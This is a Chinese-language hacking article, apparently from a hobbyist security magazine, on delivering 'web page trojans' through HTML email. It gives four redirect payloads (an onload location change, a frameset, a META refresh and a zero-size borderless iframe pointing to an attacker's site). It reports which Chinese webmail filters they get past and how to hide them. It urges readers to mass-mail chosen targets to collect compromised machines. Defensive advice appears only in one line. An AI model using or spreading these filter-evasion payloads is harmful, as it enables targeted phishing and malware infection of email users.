大家肯定對網頁木馬已經很熟悉了,但大家可能對郵件網頁木馬還不是很熟悉。其實這個也許有些高手以前已經發現并使用很久了。但我一直未見網上及雜志上有此方面的內容。這里我就以技術共享的原則跟大家談談郵件網頁木馬的思路及實現方法。
郵件網頁木馬的危害巨大,它能化被動為主動。目前網絡上流行的網頁木馬其實是很被動的,它需要被害者點擊目標網址。隨著現在網民的安全觀念的增強,網民一般不會輕易點擊陌生的網址。但郵件網頁木馬就不一樣了,你可以將電子郵件發送到你想要攻擊的目標信箱。只要你根據社會工程學及心理學的知識,將郵件的標題看上去不明顯像是垃圾郵件或廣告,那么接收者肯定會點擊此郵件的。只要他點擊了此郵件主題,看了信,哈哈,他就中招了!當然你也可以通過郵件群發器,這樣的話,傳播速率比普通的網頁木馬以及電子書木馬不知高多少呢!而且它有個最大的優點,那就是具有目標可指定性。它可以攻擊你想要的指定用戶。這一點是普通方法無法比擬的。
郵件網頁木馬其實就是在發E-mail以HTML方式內嵌網頁木馬,使郵件本身成為一張網頁木馬。到這時你也許回大呼,我怎么沒想到??!呵呵,不怕做不到,只怕想不到啊。其實有些技術本身并不難,但就是怕不往這方面想啊。我還是趕快轉入正題吧,否則,壞柿子扔過來啦!閃!
聰明的你此時可能會說,郵件網頁木馬豈不是很簡單啊,只要在發郵件是選擇以HTML方式發送,再將網頁木馬的源代碼寫入即可。事實上當然沒這么簡單,因為國內的絕大部分電子信箱都對其中一些關鍵代碼進行的屏蔽過濾。因而本文將重點研究怎樣突破重圍,在電子郵件中引入網頁木馬,達到我們的目的。
一般的網頁木馬都用到javasccript,但絕大部分郵件系統都對<script>標記作了屏蔽。從而我們只能另辟新法。我們可以不直接將網頁木馬的代碼寫入郵件中,因為如果寫入的話,有關代碼會被屏蔽,網頁木馬將失效。我們可以寫入轉向代碼,使用戶瀏覽此郵件時轉向我們放在自己網站上的網頁木馬。當然,郵件網頁木馬的難點就在轉向代碼。寫轉向代碼要有講究,因為寫得不巧妙的話,代碼將會被郵件系統屏蔽。
下面筆者來談談幾種有效的可以在電子郵件中引入網頁木馬的且沒被郵件服務器屏蔽的轉向代碼。因為絕大部分郵件系統都對<script>標記作了屏蔽,所以為了轉向代碼有效,均不使用JS和VBS標記。
1. window.location 法,代碼如下
<body onload="window.location='http://xxxxx';"></body> |
2. 框架法,代碼如下
<frameset cols="100%,*"> <frame src="http://xxxxx" scrolling="auto"> </frameset> |
其中scrolling參數值得注意,合理使用可加強隱蔽性。Cols參數可根據自己的實際情況作更改。
3. META標志法,代碼如下
<META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://xxxxx"> |
其中CONTENT后面的阿拉伯數字是代表過幾秒中鐘轉入目標網頁。
4. iframe內幀法
<iframe src="http://xxxxx" width="0" height="0" frameborder="0"> |
其中width="0" height="0"是引入網頁的大小尺寸,可以根據你的實際需要加以調整。其中的frameborder參數也很重要,如果使用的恰當的話,可以增強郵件網頁木馬的隱蔽性。為了大家看的清楚,我將widt和height均設置的非零數值,轉向的是網易的首頁(如果轉向的是放在自己網站上的網頁木馬,呵呵......)。圖1是設置frameborder=1的效果,圖2是設置為frameborder=0的效果。
大家由上面兩幅圖即可知道,如果設置為frameborder=1,郵件中可看見郵件服務器自動加帶的頁腳廣告。而設置為frameborder=0,則如圖2所示,它不像普通的信件一樣看見郵件服務器自動加帶的廣告。大家可根據具體情況選擇frameborder參數來獲得最好的偽裝引入效果,使對方感覺不到他所瀏覽的郵件是已經轉向到你的網站上的網頁木馬.
上述代碼筆者已經對國內的幾乎所有電子信箱作了測試,如網易,搜狐,新浪,億唐,21CN,TOM等等。以上四種方法各有千秋。第一種方法的適應范圍最小。比如網易、億唐都屏蔽了它。但第2、3、4方法在國內的信箱測試中均通過。尤其第2、3種方法幾乎百試百靈。當然第4種方法也很經典,參數多,隱蔽性強。大家可根據不同的目標信箱選擇最有效的轉向引入代碼。
現在只要大家會制作網頁木馬(關于網頁木馬木馬的制作方法,大家可以參見以往的黑防),擁有了性能優秀的后門程序或木馬程序,再配合本文所講的郵件木馬引入技術的話,貪心的再來個郵件群發,呵呵,你必將為所欲為,肉雞成群。而且,這種方法具有攻擊目標可指定性的優點!一場暴風雪即將來臨!大家以后還是少在公開場合公布信箱喲!當然,穩妥的措施是郵件服務器實行嚴格個代碼過濾,用戶將郵件查看方式設置為以文本方式查看!
后記:筆者順便還對幾個國外著名的郵箱:hotmail以及Yahoo作了測試,發現它們過濾得都非常嚴格。上述的4種方法的代碼都被過濾了。此時我深感國內郵件提供商與國外的差距。安全觀念的差距!但hotmail以及Yahoo并不是固若金湯。以色列網絡安全公司GreyMagic Software已經發現hotmail以及Yahoo郵箱也存在過濾不嚴的漏洞。我們可以用同步多媒體集成語言的(SMIL)的HTML+TIME技術來突破屏蔽,實現轉向引入網頁木馬的目的。慶幸的是此漏洞最近已經被hotmail以及Yahoo修補。但國內的幾乎所有電子信箱均存在此漏洞。當然深愛鉆研技術的你肯定會問,現在是否有針對hotmail以及Yahoo郵箱的有效的轉向引入代碼。答案是肯定的!這個問題留給大家思考,大家可以向xml方向去發散,相信你一定會找到的!